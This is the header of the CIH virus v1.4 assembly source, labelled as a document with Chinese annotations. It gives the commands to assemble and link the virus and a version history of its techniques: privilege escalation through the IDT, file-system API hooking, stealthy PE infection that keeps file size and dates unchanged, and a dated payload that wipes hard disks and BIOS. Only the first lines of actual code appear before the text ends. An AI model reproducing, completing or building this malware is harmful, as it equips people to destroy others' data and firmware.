CIH virus v1.4 source with Chinese annotations (CIH病毒4版本之中文注释文档格式.docx)
;                  ... of TATUNG in Taiwan
; Create Date : 04/26/1998            Now Version : 1.4
; Modification Time : 05/31/1998
;
; Turbo Assembler 4.0 :  tasm /m cih
; Link 3.01           :  tlink /3 /t cih, cih.exe
; Build and link method: Turbo Assembler is used; it can be found in Borland C++ 3.1.
; *==========================================================================*
; * Modification History                                                     *
; *==========================================================================*
; * v1.0 1. Create the Program.                                              *
; *      2. Modifies IDT to Get Ring0 Privilege.                  04/26/1998 *
; *      3. Code doesn't Reload into System.                                 *
; *      4. Call IFSMgr_InstallFileSystemApiHook to Hook File I/O.           *
; *      5. Modifies the Entry Point of IFSMgr_InstallFileSystemApiHook.     *
; *      6. When the System Opens an Existing PE File, it will be Infected,  *
; *         and it will not be Reinfected.                                   *
; *      7. It is also infected, even if it is Read-Only.                    *
; *      8. The File's Date and Time don't get Changed.                      *
; *      9. When My Code Uses IFSMgr_Ring0_FileIO, it will not Call the      *
; *         Previous FileSystemApiHook; it will Call the Function that the   *
; *         IFS Manager Would Normally Call to Implement this Particular     *
; *         I/O Request.                                                     *
; *     10. Size is only 656 Bytes.                                          *
; * v1.1 1. Especially, the File Infected will not Increase its Size... ^__^ *
; *                                                               05/15/1998 *
; *      2. Hook and Modify Structured Exception Handling. When an           *
; *         Exception Error Occurs, Our OS should be Windows NT. So My Cute  *
; *         Code will not Continue to Run; it will Jump to the Original      *
; *         Application to Run.                                              *
; *      3. Use a Better Algorithm, Reduce Size.                             *
; *      4. The "Basic" Size is only 796 Bytes.                              *
; * v1.2 1. Kill All HardDisk, and BIOS... Super... Killer...                *
; *      2. Modify the Bug of v1.1                                05/21/1998 *
; *      3. The "Basic" Size is 1003 Bytes.                                  *
; * v1.3 1. Modify the Bug that WinZip Self-Extractor Occurs Error.          *
; *         ==> Don't Infect it.                                  05/24/1998 *
; *      2. The "Basic" Size is 1010 Bytes.                                  *
; * v1.4 1. Full Modify the Bug : WinZip Self-Extractor Occurs Error.        *
; *      2. Change the Date of Killing Computers.                 05/31/1998 *
; *      3. Modify Version Copyright.                                        *
; *      4. The "Basic" Size is 1019 Bytes.                                  *
; ****************************************************************************
        .586P                           ; 586 protected-mode assembly

; ****************************************************************************
; * Executable File (Don't Modify this Section)                              *
; ****************************************************************************

OriginalAppEXE  SEGMENT

FileHeader:                             ; PE header of the compiled and linked executable (raw byte table omitted)